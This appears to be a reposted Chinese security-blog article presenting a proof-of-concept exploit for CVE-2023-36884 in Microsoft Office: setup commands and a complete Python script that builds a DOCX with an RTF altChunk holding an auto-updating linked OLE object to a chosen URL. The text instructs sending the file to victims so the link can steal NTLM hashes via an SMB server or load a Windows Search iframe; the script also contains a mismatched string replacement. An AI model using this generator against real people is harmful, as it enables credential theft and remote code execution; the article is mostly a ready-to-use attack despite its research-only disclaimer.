CVE-2023-36884:带有精心设计的文档的 MS Office HTML RCE

admin
admin
admin
138880
文章
114
评论
2024年1月2日10:52:39评论122 views字数 4004阅读13分20秒阅读模式

CVE-2023-36884:带有精心设计的文档的 MS Office HTML RCE

        该漏洞允许攻击者通过精心制作的 Office 开放可扩展标记语言 (OOXML) 文档来利用 Windows 搜索文件。

安装 PIP 包:

pip install python-docx pywin32

创建 example.html 文件并启动 Python HTTP Web 服务器:

New-Item -Path "example.html" - ItemType Filepython -m http.server 8888

然后,运行脚本:

python gen_docx_with_rtf_altchunk.py merged.docx autolinked.rtf http://localhost:8888/example.html


现在,生成的文件可以通过电子邮件或其他方式与受害者共享。该链接可以指向您的 SMB 服务器以窃取受害者的 NTLM 哈希值,也可以指向包含 iframe 的 HTML 文件,该 iframe 引用了 Windows 搜索文件,就像原始恶意软件中一样。由于缺乏进一步的信息,无法显示确切的利用情况。


# pip install python-docx pywin32import sysimport osfrom docx import Documentfrom docx.oxml.parser import OxmlElementfrom docx.oxml.ns import qnfrom docx.opc.part import Partfrom docx.opc.constants import RELATIONSHIP_TYPE as RTimport win32com.client as win32

# Get or create a DOCX documentdef get_doc(docx_file_path):    if not os.path.isfile(docx_file_path):        doc = Document()        doc.save(docx_file_path)        print(f"[+] Created a new DOCX document with name '{docx_file_path}'.")    else:        doc = Document(docx_file_path)        print(f"[+] Using an existing DOCX document with name '{docx_file_path}'.")    return doc
# Check if the RTF file exists, and create it if it doesn'tdef check_rtf_exists(rtf_file_path):    if not os.path.isfile(rtf_file_path):        gen_new_rtf(rtf_file_path)        print(f"[+] Created a new RTF document with name '{rtf_file_path}'.")    else:        print(f"[+] Using an existing RTF document with name '{rtf_file_path}'.")
# Generate a new RTF file with default contentdef gen_new_rtf(rtf_file_path):    try:        with open(rtf_file_path, 'w') as file:            rtf_example_code = "{\rtf1\ansi\deff0}"            file.write(rtf_example_code)    except Exception as e:        print(f"[-] Cannot create the RTF file. Error: {str(e)}")        sys.exit(1)
# Update the RTF file by adding 'objupdate' after 'objautolink'def update_rtf_with_objupdate(file_path):    try:        with open(file_path, 'r') as file:            # Read the content of the file            file_content = file.read()
        # Replace "objautolink" with "objautolinkobjupdate"        updated_content = file_content.replace(r'objautlink', r'objautlinkobjupdate')
        with open(file_path, 'w') as file:            # Write the updated content back to the file            file.write(updated_content)
        print(f"[+] 'objupdate' added after 'objautolink' in '{file_path}'.")
    except Exception as e:        print(f"[-] An error occurred: {str(e)}")
# Add an RTF file as an altChunk to a DOCX documentdef add_rtf_as_alt_chunk_to_doc(doc, rtf_path):    try:        package = doc.part.package        partname = package.next_partname('/word/altChunk%d.rtf')
        # Read the RTF content from the file        with open(rtf_path, 'rb') as rtf_file:            rtf_content = rtf_file.read()
        alt_part = Part(partname, 'application/rtf', rtf_content, package)        r_id = doc.part.relate_to(alt_part, RT.A_F_CHUNK)
        alt_chunk = OxmlElement('w:altChunk')        alt_chunk.set(qn('r:id'), r_id)        doc.element.body.sectPr.addprevious(alt_chunk)
        print("[+] RTF file added as altChunk.")
        # Save the modified document        doc.save(docx_file_path)
        update_rtf_with_objupdate(rtf_path)
    except Exception as e:        print(f"[-] Can not add the RTF file as altChunk to the DOC. Error: {str(e)}")        sys.exit(1)
# Add a linked OLE object with a URL to the RTF filedef add_linked_ole_object_with_url(rtf_path, url):    try:        word = win32.Dispatch("Word.Application")        doc = word.Documents.Open(os.path.abspath(rtf_path))        doc.Activate()
        # Insert the linked OLE object with an external URL        ole_shape = doc.Shapes.AddOLEObject(            ClassType="Package",            FileName=url,        # Use the URL as the FileName            LinkToFile=True,     # Create a linked object            DisplayAsIcon=True,            Left=100, Top=100, Width=100, Height=100        )
        # Save the document        doc.Save()
        # Close the document and Word application        doc.Close()        word.Quit()
        print(f"[+] Linked OLE object with URL added to '{rtf_path}'.")
    except Exception as e:        print(f"[-] Cannot add a linked OLE object to the RTF file. Error: {str(e)}")        sys.exit(1)
if __name__ == "__main__":    if len(sys.argv) != 4:        print("Usage: python generate_rtf_with_autolink.py <doc_file> <rtf_file> <ole_objects_url>")        sys.exit(1)
    # Get arguments    docx_file_path = sys.argv[1]    rtf_file_path = sys.argv[2]    url = sys.argv[3]
    # Check if the DOCX file exists, if not, create one    doc = get_doc(docx_file_path)
    # Check if the RTF file exists, if not, create one    check_rtf_exists(rtf_file_path)
    # Add a linked OLE object to RTF with an external URL    add_linked_ole_object_with_url(rtf_file_path, url)
    # Add the RTF file to the DOCX as an altChunk    add_rtf_as_alt_chunk_to_doc(doc, rtf_file_path)
    print(f"[+] RTF file '{rtf_file_path}' added as altChunk to '{docx_file_path}'.")

原文始发于微信公众号(Khan安全团队):CVE-2023-36884:带有精心设计的文档的 MS Office HTML RCE

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年1月2日10:52:39
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CVE-2023-36884:带有精心设计的文档的 MS Office HTML RCEhttps://cn-sec.com/archives/2355086.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息